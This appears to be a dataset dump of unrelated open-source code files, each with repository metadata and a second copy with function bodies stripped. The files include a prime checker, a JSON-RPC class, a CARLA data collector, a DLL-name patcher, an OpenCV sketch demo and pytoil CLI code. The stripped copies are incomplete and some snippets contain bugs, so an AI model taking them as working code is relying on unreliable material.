print(DFS(1,1)) | 298 | 0 | 23 |
e391e62ba2fcd5966a5887e57e78f4387f40acc7 | 1,122 | py | Python | python/prime_number_check3.py | leewalter/coding | 2afd9dbfc1ecb94def35b953f4195a310d6953c9 | [
"Apache-2.0"
] | null | null | null | python/prime_number_check3.py | leewalter/coding | 2afd9dbfc1ecb94def35b953f4195a310d6953c9 | [
"Apache-2.0"
] | null | null | null | python/prime_number_check3.py | leewalter/coding | 2afd9dbfc1ecb94def35b953f4195a310d6953c9 | [
"Apache-2.0"
] | 1 | 2020-08-29T17:12:52.000Z | 2020-08-29T17:12:52.000Z | # ref https://www.youtube.com/watch?v=2p3kwF04xcA&index=24&list=PLi01XoE8jYohWFPpC17Z-wWhPOSuh8Er-
import math
import time
'''
for n in range(1,21):
print(n, is_prime_v2(n))
'''
t0 = time.time()
for n in range(1,1000000):
is_prime_v2(n)
t1 = time.time()
print("time required for 1000000 :", t1-t0)
#print("test raise ", is_prime_v2(-10))
'''
if use n % 2 == 0, then
time required for 1000000 : 9.644205331802368
without above, then close timings,
time required for 1000000 : 10.904832363128662
if add % 2 and %3, then for d in range(5, max_divisor+1, 2):
then half the time !
time required for 1000000 : 5.761587858200073
'''
| 20.4 | 98 | 0.620321 | # ref https://www.youtube.com/watch?v=2p3kwF04xcA&index=24&list=PLi01XoE8jYohWFPpC17Z-wWhPOSuh8Er-
import math
import time
def is_prime_v2(n):
if n <= 0:
raise ("n must be a positive integer ! ")
return False
if n == 1:
return False
elif n == 2:
return True
elif n % 2 == 0:
return False
elif n % 3 == 0:
return False
max_divisor = math.floor(math.sqrt(n)) # check half of the combinations
for d in range(5, max_divisor+1, 2): # start from 5,7, etc..
if n % d == 0:
return False
return True
'''
for n in range(1,21):
print(n, is_prime_v2(n))
'''
t0 = time.time()
for n in range(1,1000000):
is_prime_v2(n)
t1 = time.time()
print("time required for 1000000 :", t1-t0)
#print("test raise ", is_prime_v2(-10))
'''
if use n % 2 == 0, then
time required for 1000000 : 9.644205331802368
without above, then close timings,
time required for 1000000 : 10.904832363128662
if add % 2 and %3, then for d in range(5, max_divisor+1, 2):
then half the time !
time required for 1000000 : 5.761587858200073
'''
| 455 | 0 | 23 |
074823aa33e6960d86e8b83e4a620c6fe06c32cf | 1,014 | py | Python | round/rpc/request.py | cybergarage/round-py | fb9404835ad1eb3f4b63eac92a8de2a3e60aa38a | [
"BSD-3-Clause"
] | null | null | null | round/rpc/request.py | cybergarage/round-py | fb9404835ad1eb3f4b63eac92a8de2a3e60aa38a | [
"BSD-3-Clause"
] | null | null | null | round/rpc/request.py | cybergarage/round-py | fb9404835ad1eb3f4b63eac92a8de2a3e60aa38a | [
"BSD-3-Clause"
] | null | null | null | #################################################################
#
# Round for Python
#
# Copyright (C) Satoshi Konno 2016
#
# This is licensed under BSD-style license, see file COPYING.
#
##################################################################
from __future__ import absolute_import
import json
from .. import constants
| 22.533333 | 67 | 0.58284 | #################################################################
#
# Round for Python
#
# Copyright (C) Satoshi Konno 2016
#
# This is licensed under BSD-style license, see file COPYING.
#
##################################################################
from __future__ import absolute_import
import json
from .. import constants
class Request:
def __init__(self):
self.dict = {
constants.JSON_RPC_JSONRPC: constants.JSON_RPC_VERSION,
}
def __str__(self):
return json.dumps(self.dict)
@property
def version(self):
return self.dict[constants.JSON_RPC_JSONRPC]
@property
def method(self):
return self.dict[constants.JSON_RPC_METHOD]
@method.setter
def method(self, method):
self.dict[constants.JSON_RPC_METHOD] = method
@property
def params(self):
return self.dict[constants.JSON_RPC_PARAMS]
@params.setter
def params(self, params):
self.dict[constants.JSON_RPC_PARAMS] = params
| 394 | 261 | 23 |
b14b7cdedd8f1fb33b998259010f68d2d3472946 | 5,081 | py | Python | scripts/ff_collect_pm_data.py | Czworldy/GP_traj | 96261f39a5a322092e3a6be98938bb4601f0f746 | [
"MIT"
] | 1 | 2021-06-08T06:09:55.000Z | 2021-06-08T06:09:55.000Z | scripts/ff_collect_pm_data.py | Czworldy/GP_traj | 96261f39a5a322092e3a6be98938bb4601f0f746 | [
"MIT"
] | null | null | null | scripts/ff_collect_pm_data.py | Czworldy/GP_traj | 96261f39a5a322092e3a6be98938bb4601f0f746 | [
"MIT"
] | null | null | null |
import os
import sys
from os.path import join, dirname
sys.path.insert(0, join(dirname(__file__), '..'))
import simulator
simulator.load('/home/wang/CARLA_0.9.9.4')
from simulator import config
import carla
import argparse
import time
from tqdm import tqdm
MAX_SPEED = 40
TRAJ_LENGTH = 25#25
vehicle_width = 2.0
longitudinal_sample_number_near = 8
longitudinal_sample_number_far = 0.5
lateral_sample_number = 20
lateral_step_factor = 1.0
parser = argparse.ArgumentParser(description='Params')
parser.add_argument('-d', '--data', type=int, default=1, help='data index')
parser.add_argument('-n', '--num', type=int, default=100000, help='total number')
args = parser.parse_args()
data_index = args.data
save_path = '/media/wang/DATASET/CARLA_HUMAN/town01/'+str(data_index)+'/'
sensor_dict = {
'camera':{
'transform':carla.Transform(carla.Location(x=0.5, y=0.0, z=2.5)),
# 'callback':image_callback,
},
'lidar':{
'transform':carla.Transform(carla.Location(x=0.5, y=0.0, z=2.5)),
# 'callback':lidar_callback,
},
}
from utils.system import env_path
env_path.remove_python2_path(sys)
import cv2
env_path.append_python2_path(sys)
from utils.collect_pm import CollectPerspectiveImage
from utils.carla_sensor import Sensor, CarlaSensorMaster
if __name__ == '__main__':
# rospy.init_node('collect_pm')
try:
main()
except KeyboardInterrupt:
#exit(0)
pass | 31.171779 | 112 | 0.678016 |
import os
import sys
from os.path import join, dirname
sys.path.insert(0, join(dirname(__file__), '..'))
import simulator
simulator.load('/home/wang/CARLA_0.9.9.4')
from simulator import config
import carla
import argparse
import time
from tqdm import tqdm
MAX_SPEED = 40
TRAJ_LENGTH = 25#25
vehicle_width = 2.0
longitudinal_sample_number_near = 8
longitudinal_sample_number_far = 0.5
lateral_sample_number = 20
lateral_step_factor = 1.0
parser = argparse.ArgumentParser(description='Params')
parser.add_argument('-d', '--data', type=int, default=1, help='data index')
parser.add_argument('-n', '--num', type=int, default=100000, help='total number')
args = parser.parse_args()
data_index = args.data
save_path = '/media/wang/DATASET/CARLA_HUMAN/town01/'+str(data_index)+'/'
sensor_dict = {
'camera':{
'transform':carla.Transform(carla.Location(x=0.5, y=0.0, z=2.5)),
# 'callback':image_callback,
},
'lidar':{
'transform':carla.Transform(carla.Location(x=0.5, y=0.0, z=2.5)),
# 'callback':lidar_callback,
},
}
from utils.system import env_path
env_path.remove_python2_path(sys)
import cv2
env_path.append_python2_path(sys)
from utils.collect_pm import CollectPerspectiveImage
from utils.carla_sensor import Sensor, CarlaSensorMaster
def mkdir(path):
if not os.path.exists(save_path+path):
os.makedirs(save_path+path)
def read_img(time_stamp):
img_path = save_path + 'img/'
file_name = str(time_stamp) + '.png'
img = cv2.imread(img_path + file_name)
return img
def read_state():
state_path = save_path + 'state/'
# read pose
pose_file = state_path + 'pos.txt'
time_stamp_list = []
time_stamp_pose_dict = dict()
file = open(pose_file, 'r')
while 1:
line = file.readline()
if not line:
break
if line == '\n':
continue
# print(line)
line_list = line.split()
index = eval(line_list[0])
transform = carla.Transform()
transform.location.x = eval(line_list[1])
transform.location.y = eval(line_list[2])
transform.location.z = eval(line_list[3])
transform.rotation.pitch = eval(line_list[4])
transform.rotation.yaw = eval(line_list[5])
transform.rotation.roll = eval(line_list[6])
time_stamp_list.append(index)
time_stamp_pose_dict[index] = transform
file.close()
return time_stamp_list, time_stamp_pose_dict
def distance(pose1, pose2):
return pose1.location.distance(pose2.location)
def find_traj_with_fix_length(start_index, time_stamp_list, time_stamp_pose_dict):
length = 0.0
for i in range(start_index, len(time_stamp_list)-1):
length += distance(time_stamp_pose_dict[time_stamp_list[i]], time_stamp_pose_dict[time_stamp_list[i+1]])
#print('here: '+str((i, length)))
if length >= TRAJ_LENGTH:
return i
return -1
class Param(object):
def __init__(self):
self.traj_length = float(TRAJ_LENGTH)
self.target_speed = float(MAX_SPEED)
self.vehicle_width = float(vehicle_width)
self.longitudinal_sample_number_near = longitudinal_sample_number_near
self.longitudinal_sample_number_far = longitudinal_sample_number_far
self.lateral_sample_number = lateral_sample_number
self.lateral_step_factor = lateral_step_factor
def main():
mkdir('pm/')
time_stamp_list, time_stamp_pose_dict = read_state()
time_stamp_list.sort()
relative_time_stamp_list = [t - time_stamp_list[0] for t in time_stamp_list]
print(len(relative_time_stamp_list))
param = Param()
sensor = Sensor(sensor_dict['camera']['transform'], config['camera'])
sensor_master = CarlaSensorMaster(sensor, sensor_dict['camera']['transform'], binded=True)
collect_perspective = CollectPerspectiveImage(param, sensor_master)
for index in tqdm(range(len(time_stamp_list))):
time_stamp = time_stamp_list[index]
end_index = find_traj_with_fix_length(index, time_stamp_list, time_stamp_pose_dict)
if end_index < 0:
print('no enough traj: ', str(index), index/len(time_stamp_list))
break
vehicle_transform = time_stamp_pose_dict[time_stamp] # in world coordinate
traj_pose_list = []
for i in range(index, end_index):
time_stamp_i = time_stamp_list[i]
time_stamp_pose = time_stamp_pose_dict[time_stamp_i]
traj_pose_list.append((time_stamp_i, time_stamp_pose))
img = read_img(time_stamp)
#t1 = time.time()
empty_image = collect_perspective.getPM(traj_pose_list, vehicle_transform, img)
#t2 = time.time()
#cv2.imshow('empty_image', empty_image)
#cv2.waitKey(3)
cv2.imwrite(save_path+'pm/'+str(time_stamp)+'.png', empty_image)
#print('time total: ' + str(t2-t1))
#print()
if __name__ == '__main__':
# rospy.init_node('collect_pm')
try:
main()
except KeyboardInterrupt:
#exit(0)
pass | 3,445 | -1 | 195 |
e528965623d652c281c15da441bcfaa1d1f342f4 | 1,199 | py | Python | recipes/Python/576873_Patch_extensibinaries_compiled_previous/recipe-576873.py | tdiprima/code | 61a74f5f93da087d27c70b2efe779ac6bd2a3b4f | [
"MIT"
] | 2,023 | 2017-07-29T09:34:46.000Z | 2022-03-24T08:00:45.000Z | recipes/Python/576873_Patch_extensibinaries_compiled_previous/recipe-576873.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 32 | 2017-09-02T17:20:08.000Z | 2022-02-11T17:49:37.000Z | recipes/Python/576873_Patch_extensibinaries_compiled_previous/recipe-576873.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 780 | 2017-07-28T19:23:28.000Z | 2022-03-25T20:39:41.000Z | # -*- coding: Windows-1251 -*-
'''
find_dll_name.py
List all python dll names in DLL/PYD/etc file.
Author: Denis Barmenkov <denis.barmenkov@gmail.com>
Copyright: this code is free, but if you want to use it,
please keep this multiline comment along with source.
Thank you.
2009-08-09
'''
import re
import sys
fn = sys.argv[1]
f = open(fn, 'rb')
data = f.read()
f.close()
dll_re = re.compile(r'python\d\d\.dll', re.M | re.S)
found = dll_re.findall(data)
print found
#-------------- cut here -----------------#
# -*- coding: Windows-1251 -*-
'''
patch_dll_name.py
Patch extension precompiled binary by changing python dll name.
Author: Denis Barmenkov <denis.barmenkov@gmail.com>
Copyright: this code is free, but if you want to use it,
please keep this multiline comment along with source.
Thank you.
2009-08-09
'''
import sys
import os
OLD_NAME = 'python23.dll'
NEW_NAME = 'python24.dll'
fn = sys.argv[1]
f = open(fn, 'rb')
data = f.read()
f.close()
data = data.replace(OLD_NAME, NEW_NAME)
bak_fn = fn + '.bak'
os.rename(fn, bak_fn) # rename original file to .BAK
f = open(fn, 'wb')
f.write(data) # write patched version
f.close()
| 18.446154 | 65 | 0.65221 | # -*- coding: Windows-1251 -*-
'''
find_dll_name.py
List all python dll names in DLL/PYD/etc file.
Author: Denis Barmenkov <denis.barmenkov@gmail.com>
Copyright: this code is free, but if you want to use it,
please keep this multiline comment along with source.
Thank you.
2009-08-09
'''
import re
import sys
fn = sys.argv[1]
f = open(fn, 'rb')
data = f.read()
f.close()
dll_re = re.compile(r'python\d\d\.dll', re.M | re.S)
found = dll_re.findall(data)
print found
#-------------- cut here -----------------#
# -*- coding: Windows-1251 -*-
'''
patch_dll_name.py
Patch extension precompiled binary by changing python dll name.
Author: Denis Barmenkov <denis.barmenkov@gmail.com>
Copyright: this code is free, but if you want to use it,
please keep this multiline comment along with source.
Thank you.
2009-08-09
'''
import sys
import os
OLD_NAME = 'python23.dll'
NEW_NAME = 'python24.dll'
fn = sys.argv[1]
f = open(fn, 'rb')
data = f.read()
f.close()
data = data.replace(OLD_NAME, NEW_NAME)
bak_fn = fn + '.bak'
os.rename(fn, bak_fn) # rename original file to .BAK
f = open(fn, 'wb')
f.write(data) # write patched version
f.close()
| 0 | 0 | 0 |
5b27ddcccb0cb4ccd03ff118b4a52ef550bf32a2 | 678 | py | Python | sketch/sketchs.py | keshab97/100-days-of-ml | 2d995b151185ba9db4d01f34565d4e059d410e33 | [
"MIT"
] | 1 | 2019-12-03T18:36:55.000Z | 2019-12-03T18:36:55.000Z | sketch/sketchs.py | keshab97/100-days-of-ml | 2d995b151185ba9db4d01f34565d4e059d410e33 | [
"MIT"
] | null | null | null | sketch/sketchs.py | keshab97/100-days-of-ml | 2d995b151185ba9db4d01f34565d4e059d410e33 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 8 08:21:19 2018
@author: alkesha
"""
import cv2
import numpy as np
#function to draw sketch
camera=cv2.VideoCapture(0)
while True:
ret,frame=camera.read()
cv2.imshow("sketch live",sketching(frame))
if cv2.waitKey(1)==ord('q'):
break
camera.release()
camera.destroyAllWindows() | 23.37931 | 63 | 0.70059 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 8 08:21:19 2018
@author: alkesha
"""
import cv2
import numpy as np
#function to draw sketch
def sketching(image):
grey_image= cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
grey_blur=cv2.GaussianBlur(grey_image,(5,5),0)
#grey_blur=cv2.bilateralFilter(grey_image,9,75,75)
canny=cv2.Canny(grey_blur,10,50)
ret,frame=cv2.threshold(canny,65,255,cv2.THRESH_BINARY_INV)
return frame
camera=cv2.VideoCapture(0)
while True:
ret,frame=camera.read()
cv2.imshow("sketch live",sketching(frame))
if cv2.waitKey(1)==ord('q'):
break
camera.release()
camera.destroyAllWindows() | 279 | 0 | 23 |
6272988d075e7579aa9fc785c1021ca88c2ac2ee | 10,047 | py | Python | pytoil/cli/new.py | FollowTheProcess/pytoil | b13acb14f015ae5399d7697bdc3e0e475dff03ec | [
"Apache-2.0"
] | 6 | 2021-05-08T20:31:03.000Z | 2022-03-08T01:25:43.000Z | pytoil/cli/new.py | FollowTheProcess/pytoil | b13acb14f015ae5399d7697bdc3e0e475dff03ec | [
"Apache-2.0"
] | 116 | 2021-07-08T11:21:22.000Z | 2022-03-30T14:04:51.000Z | pytoil/cli/new.py | FollowTheProcess/pytoil | b13acb14f015ae5399d7697bdc3e0e475dff03ec | [
"Apache-2.0"
] | null | null | null | """
The pytoil new command.
Author: Tom Fleet
Created: 25/06/2021
"""
from typing import List
import httpx
import typer
from cookiecutter.main import cookiecutter
from wasabi import msg
from pytoil.api import API
from pytoil.cli import utils
from pytoil.config import Config
from pytoil.environments import Conda, Environment, Venv, VirtualEnv
from pytoil.exceptions import (
CargoNotInstalledError,
EnvironmentAlreadyExistsError,
GoNotInstalledError,
)
from pytoil.git import Git
from pytoil.repo import Repo
from pytoil.starters import GoStarter, PythonStarter, RustStarter, Starter
from pytoil.vscode import VSCode
app = typer.Typer()
@app.command(context_settings={"allow_extra_args": True})
def new(
ctx: typer.Context,
project: str = typer.Argument(
...,
help="Name of the project to create.",
),
cookie: str = typer.Option(
None,
"--cookie",
"-c",
help="URL to a cookiecutter template repo from which to build the project.",
),
starter: Starter = typer.Option(
Starter.none,
"--starter",
"-s",
help="Use a language-specific starter template",
case_sensitive=False,
show_default=True,
),
venv: VirtualEnv = typer.Option(
VirtualEnv.none,
"--venv",
"-v",
help="Which type of virtual environment to create for the project.",
case_sensitive=False,
show_default=True,
),
no_git: bool = typer.Option(
False,
"--no-git",
"-n",
help="Don't initialise an empty git repo in the root of the project.",
),
) -> None:
"""
Create a new development project.
Bare usage will simply create an empty folder in your configured projects
directory.
You can also create a project from a cookiecutter template by passing a valid
url to the '--cookie/-c' flag.
If you just want a very simple, language-specific starting template, use the
'--starter/-s' option.
By default, pytoil will initialise an empty git repo in the folder, following
the style of modern language build tools such as rust's cargo. You can disable
this behaviour by setting 'init_on_new' to false in pytoil's config file
or by passing the '--no-git/-n' flag here.
If you want pytoil to create a new virtual environment for your project, you
can use the '--venv/-v' flag. Standard python and conda virtual environments
are supported.
If the '--venv/-v' flag is used, you may also pass a list of python packages
to install into the created virtual environment. These will be delegated to
the appropriate tool (pip or conda) depending on what environment was created.
If the environment is conda, the packages will be passed at environment creation
time meaning they will have their dependencies resolved together. Normal python
environments will first be created and then have specified packages installed.
If 'common_packages' is specified in pytoil's config file, these will automatically
be included in the environment.
To specify versions of packages via the command line, you must enclose them
in double quotes e.g. "flask>=1.0.0" not flask>=1.0.0 otherwise this will
be interpreted by the shell as a command redirection.
Examples:
$ pytoil new my_project
$ pytoil new my_project --cookie https://github.com/some/cookie.git
$ pytoil new my_project --venv conda
$ pytoil new my_project -c https://github.com/some/cookie.git -v conda --no-git
$ pytoil new my_project -v venv requests "flask>=1.0.0"
$ pytoil new my_project --starter python
"""
# Get config and ensure user can access API
config = Config.from_file()
utils.warn_if_no_api_creds(config)
# Setup the objects required
api = API(username=config.username, token=config.token)
repo = Repo(
owner=config.username,
name=project,
local_path=config.projects_dir.joinpath(project),
)
code = VSCode(root=repo.local_path)
git = Git()
if ctx.args:
packages: List[str] = config.common_packages + ctx.args
else:
packages = config.common_packages
# Resolve config vs flag for no-git
# flag takes priority over config
use_git: bool = config.init_on_new and not no_git
# Check is project already exists and warn/exit if so
pre_new_checks(repo=repo, api=api)
# Cant use --venv with non-python starters
if (
starter.value != starter.none # User specified starter
and starter.value != starter.python # The starter is not python
and venv.value != venv.none # And the user wants a virtual environment
):
msg.warn(
f"Can't create a venv for {starter.value} project!",
spaced=True,
exits=1,
)
# If we get here, all is well and we can create stuff!
make_new_project(
repo=repo,
git=git,
cookie=cookie,
starter=starter,
use_git=use_git,
config=config,
)
if venv.value == venv.venv:
env = create_virtualenv(repo=repo, packages=packages)
if config.vscode:
msg.info(f"Opening {repo.name!r} in VSCode.", spaced=True)
code.set_workspace_python(env.executable)
code.open()
elif venv.value == venv.conda:
env = create_condaenv(repo=repo, packages=packages)
if config.vscode:
msg.info(f"Opening {repo.name!r} in VSCode.", spaced=True)
code.set_workspace_python(env.executable)
code.open()
else:
# Only other allowed condition is none
typer.secho(
"Virtual environment not requested. Skipping environment creation.",
fg=typer.colors.YELLOW,
)
if config.vscode:
msg.info(f"Opening {repo.name!r} in VSCode.", spaced=True)
code.open()
def make_new_project(
repo: Repo, git: Git, cookie: str, starter: Starter, use_git: bool, config: Config
) -> None:
"""
Create a new development project either from a cookiecutter
template or from scratch.
"""
# Can't use starter and cookiecutter at the same time
if starter.value != Starter.none and cookie:
msg.warn(
"'--cookie' and '--starter' are mutually exclusive.",
exits=1,
)
if cookie:
# We don't initialise a git repo for cookiecutters
# some templates have hooks which do this, mine do!
msg.info(f"Creating {repo.name!r} from cookiecutter: {cookie!r}.")
cookiecutter(template=cookie, output_dir=config.projects_dir)
elif starter == Starter.go:
msg.info(f"Creating {repo.name!r} from starter: {starter.value!r}.")
go_st = GoStarter(path=config.projects_dir, name=repo.name)
try:
go_st.generate(username=config.username)
except GoNotInstalledError:
msg.fail("Error: Go not installed.", spaced=True, exits=1)
if use_git:
git.init(path=repo.local_path, check=True)
elif starter == Starter.python:
msg.info(f"Creating {repo.name!r} from starter: {starter.value!r}.")
py_st = PythonStarter(path=config.projects_dir, name=repo.name)
py_st.generate()
if use_git:
git.init(path=repo.local_path, check=True)
elif starter == Starter.rust:
msg.info(f"Creating {repo.name!r} from starter: {starter.value!r}.")
rs_st = RustStarter(path=config.projects_dir, name=repo.name)
try:
rs_st.generate()
except CargoNotInstalledError:
msg.fail("Error: Cargo not installed.", spaced=True, exits=1)
else:
msg.info(f"Creating {repo.name!r} at {repo.local_path}.")
# Make an empty dir and git repo
repo.local_path.mkdir(parents=True)
if use_git:
git.init(path=repo.local_path, check=True)
def pre_new_checks(repo: Repo, api: API) -> None:
"""
Checks whether the repo already exists either locally
or remotely, prints helpful warning messages and exits
the program if True.
"""
is_local = repo.exists_local()
try:
is_remote = repo.exists_remote(api=api)
except httpx.HTTPStatusError as err:
utils.handle_http_status_errors(error=err)
else:
if is_local:
msg.warn(
title=f"{repo.name} already exists locally!",
text=f"To checkout this project, use 'pytoil checkout {repo.name}'.",
spaced=True,
exits=1,
)
elif is_remote:
msg.warn(
title=f"{repo.name!r} already exists on GitHub!",
text=f"To checkout this project, use 'pytoil checkout {repo.name}'.",
spaced=True,
exits=1,
)
def create_virtualenv(repo: Repo, packages: List[str]) -> Environment:
"""
Creates and returns new virtual environment with packages and reports
to user.
"""
msg.info(
f"Creating virtual environment for {repo.name!r}",
text=f"Including packages: {', '.join(packages)}",
spaced=True,
)
env = Venv(project_path=repo.local_path)
with msg.loading("Working..."):
env.create(packages=packages)
return env
def create_condaenv(repo: Repo, packages: List[str]) -> Environment:
"""
Creates and returns new conda environment with packages and reports
to user.
"""
msg.info(
f"Creating conda environment for {repo.name!r}",
text=f"Including packages: {', '.join(packages)}",
spaced=True,
)
env = Conda(name=repo.name, project_path=repo.local_path)
try:
with msg.loading("Working..."):
env.create(packages=packages)
except EnvironmentAlreadyExistsError:
msg.warn(
f"Conda environment {env.name!r} already exists!", spaced=True, exits=1
)
return env
| 31.396875 | 87 | 0.640092 | """
The pytoil new command.
Author: Tom Fleet
Created: 25/06/2021
"""
from typing import List
import httpx
import typer
from cookiecutter.main import cookiecutter
from wasabi import msg
from pytoil.api import API
from pytoil.cli import utils
from pytoil.config import Config
from pytoil.environments import Conda, Environment, Venv, VirtualEnv
from pytoil.exceptions import (
CargoNotInstalledError,
EnvironmentAlreadyExistsError,
GoNotInstalledError,
)
from pytoil.git import Git
from pytoil.repo import Repo
from pytoil.starters import GoStarter, PythonStarter, RustStarter, Starter
from pytoil.vscode import VSCode
app = typer.Typer()
@app.command(context_settings={"allow_extra_args": True})
def new(
ctx: typer.Context,
project: str = typer.Argument(
...,
help="Name of the project to create.",
),
cookie: str = typer.Option(
None,
"--cookie",
"-c",
help="URL to a cookiecutter template repo from which to build the project.",
),
starter: Starter = typer.Option(
Starter.none,
"--starter",
"-s",
help="Use a language-specific starter template",
case_sensitive=False,
show_default=True,
),
venv: VirtualEnv = typer.Option(
VirtualEnv.none,
"--venv",
"-v",
help="Which type of virtual environment to create for the project.",
case_sensitive=False,
show_default=True,
),
no_git: bool = typer.Option(
False,
"--no-git",
"-n",
help="Don't initialise an empty git repo in the root of the project.",
),
) -> None:
"""
Create a new development project.
Bare usage will simply create an empty folder in your configured projects
directory.
You can also create a project from a cookiecutter template by passing a valid
url to the '--cookie/-c' flag.
If you just want a very simple, language-specific starting template, use the
'--starter/-s' option.
By default, pytoil will initialise an empty git repo in the folder, following
the style of modern language build tools such as rust's cargo. You can disable
this behaviour by setting 'init_on_new' to false in pytoil's config file
or by passing the '--no-git/-n' flag here.
If you want pytoil to create a new virtual environment for your project, you
can use the '--venv/-v' flag. Standard python and conda virtual environments
are supported.
If the '--venv/-v' flag is used, you may also pass a list of python packages
to install into the created virtual environment. These will be delegated to
the appropriate tool (pip or conda) depending on what environment was created.
If the environment is conda, the packages will be passed at environment creation
time meaning they will have their dependencies resolved together. Normal python
environments will first be created and then have specified packages installed.
If 'common_packages' is specified in pytoil's config file, these will automatically
be included in the environment.
To specify versions of packages via the command line, you must enclose them
in double quotes e.g. "flask>=1.0.0" not flask>=1.0.0 otherwise this will
be interpreted by the shell as a command redirection.
Examples:
$ pytoil new my_project
$ pytoil new my_project --cookie https://github.com/some/cookie.git
$ pytoil new my_project --venv conda
$ pytoil new my_project -c https://github.com/some/cookie.git -v conda --no-git
$ pytoil new my_project -v venv requests "flask>=1.0.0"
$ pytoil new my_project --starter python
"""
# Get config and ensure user can access API
config = Config.from_file()
utils.warn_if_no_api_creds(config)
# Setup the objects required
api = API(username=config.username, token=config.token)
repo = Repo(
owner=config.username,
name=project,
local_path=config.projects_dir.joinpath(project),
)
code = VSCode(root=repo.local_path)
git = Git()
if ctx.args:
packages: List[str] = config.common_packages + ctx.args
else:
packages = config.common_packages
# Resolve config vs flag for no-git
# flag takes priority over config
use_git: bool = config.init_on_new and not no_git
# Check is project already exists and warn/exit if so
pre_new_checks(repo=repo, api=api)
# Cant use --venv with non-python starters
if (
starter.value != starter.none # User specified starter
and starter.value != starter.python # The starter is not python
and venv.value != venv.none # And the user wants a virtual environment
):
msg.warn(
f"Can't create a venv for {starter.value} project!",
spaced=True,
exits=1,
)
# If we get here, all is well and we can create stuff!
make_new_project(
repo=repo,
git=git,
cookie=cookie,
starter=starter,
use_git=use_git,
config=config,
)
if venv.value == venv.venv:
env = create_virtualenv(repo=repo, packages=packages)
if config.vscode:
msg.info(f"Opening {repo.name!r} in VSCode.", spaced=True)
code.set_workspace_python(env.executable)
code.open()
elif venv.value == venv.conda:
env = create_condaenv(repo=repo, packages=packages)
if config.vscode:
msg.info(f"Opening {repo.name!r} in VSCode.", spaced=True)
code.set_workspace_python(env.executable)
code.open()
else:
# Only other allowed condition is none
typer.secho(
"Virtual environment not requested. Skipping environment creation.",
fg=typer.colors.YELLOW,
)
if config.vscode:
msg.info(f"Opening {repo.name!r} in VSCode.", spaced=True)
code.open()
def make_new_project(
repo: Repo, git: Git, cookie: str, starter: Starter, use_git: bool, config: Config
) -> None:
"""
Create a new development project either from a cookiecutter
template or from scratch.
"""
# Can't use starter and cookiecutter at the same time
if starter.value != Starter.none and cookie:
msg.warn(
"'--cookie' and '--starter' are mutually exclusive.",
exits=1,
)
if cookie:
# We don't initialise a git repo for cookiecutters
# some templates have hooks which do this, mine do!
msg.info(f"Creating {repo.name!r} from cookiecutter: {cookie!r}.")
cookiecutter(template=cookie, output_dir=config.projects_dir)
elif starter == Starter.go:
msg.info(f"Creating {repo.name!r} from starter: {starter.value!r}.")
go_st = GoStarter(path=config.projects_dir, name=repo.name)
try:
go_st.generate(username=config.username)
except GoNotInstalledError:
msg.fail("Error: Go not installed.", spaced=True, exits=1)
if use_git:
git.init(path=repo.local_path, check=True)
elif starter == Starter.python:
msg.info(f"Creating {repo.name!r} from starter: {starter.value!r}.")
py_st = PythonStarter(path=config.projects_dir, name=repo.name)
py_st.generate()
if use_git:
git.init(path=repo.local_path, check=True)
elif starter == Starter.rust:
msg.info(f"Creating {repo.name!r} from starter: {starter.value!r}.")
rs_st = RustStarter(path=config.projects_dir, name=repo.name)
try:
rs_st.generate()
except CargoNotInstalledError:
msg.fail("Error: Cargo not installed.", spaced=True, exits=1)
else:
msg.info(f"Creating {repo.name!r} at {repo.local_path}.")
# Make an empty dir and git repo
repo.local_path.mkdir(parents=True)
if use_git:
git.init(path=repo.local_path, check=True)
def pre_new_checks(repo: Repo, api: API) -> None:
"""
Checks whether the repo already exists either locally
or remotely, prints helpful warning messages and exits
the program if True.
"""
is_local = repo.exists_local()
try:
is_remote = repo.exists_remote(api=api)
except httpx.HTTPStatusError as err:
utils.handle_http_status_errors(error=err)
else:
if is_local:
msg.warn(
title=f"{repo.name} already exists locally!",
text=f"To checkout this project, use 'pytoil checkout {repo.name}'.",
spaced=True,
exits=1,
)
elif is_remote:
msg.warn(
title=f"{repo.name!r} already exists on GitHub!",
text=f"To checkout this project, use 'pytoil checkout {repo.name}'.",
spaced=True,
exits=1,
)
def create_virtualenv(repo: Repo, packages: List[str]) -> Environment:
"""
Creates and returns new virtual environment with packages and reports
to user.
"""
msg.info(
f"Creating virtual environment for {repo.name!r}",
text=f"Including packages: {', '.join(packages)}",
spaced=True,
)
env = Venv(project_path=repo.local_path)
with msg.loading("Working..."):
env.create(packages=packages)
return env
def create_condaenv(repo: Repo, packages: List[str]) -> Environment:
"""
Creates and returns new conda environment with packages and reports
to user.
"""
msg.info(
f"Creating conda environment for {repo.name!r}",
text=f"Including packages: {', '.join(packages)}",
spaced=True,
)
env = Conda(name=repo.name, project_path=repo.local_path)
try:
with msg.loading("Working..."):
env.create(packages=packages)
except EnvironmentAlreadyExistsError:
msg.warn(
f"Conda environment {env.name!r} already exists!", spaced=True, exits=1
)
return env
| 0 | 0 | 0 |
95e1a4d230cc4ecc6e1410bd9af1d4589b983194 | 4,467 | py | Python | fserver/path_util.py | Carrotor116/fserver | 86934023fb080088854b4bae7867ad3667561111 | [
"MIT"
] | 1 | 2020-08-06T01:25:14.000Z | 2020-08-06T01:25:14.000Z | fserver/path_util.py | Carrotor116/fserver | 86934023fb080088854b4bae7867ad3667561111 | [
"MIT"
] | 1 | 2020-07-26T09:27:01.000Z | 2020-07-26T09:27:01.000Z | fserver/path_util.py | Carrotor116/fserver | 86934023fb080088854b4bae7867ad3667561111 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import re
import sys
from werkzeug import utils
try:
from os import scandir
except:
from scandir import scandir
def parents_path(path):
"""
:param path:
:return: return parents_path which does not contain the end '/', that is remove the end '/'
"""
res = set()
path = normalize_path(path)
while '/' in path:
sep_ind = path.rindex('/')
res.add(path[:sep_ind])
path = path[:sep_ind]
if path.startswith('./') or not path.startswith('.'):
res.add('.')
return res
def parent_path(path):
"""
:param path:
:return: return path which does not contain the end '/'
"""
path = normalize_path(path)
if '/' not in path:
return '.'
else:
sep_ind = path.rindex('/')
return path[:sep_ind]
_filename_ascii_strip_re = re.compile(r"[^A-Za-z0-9_.-]")
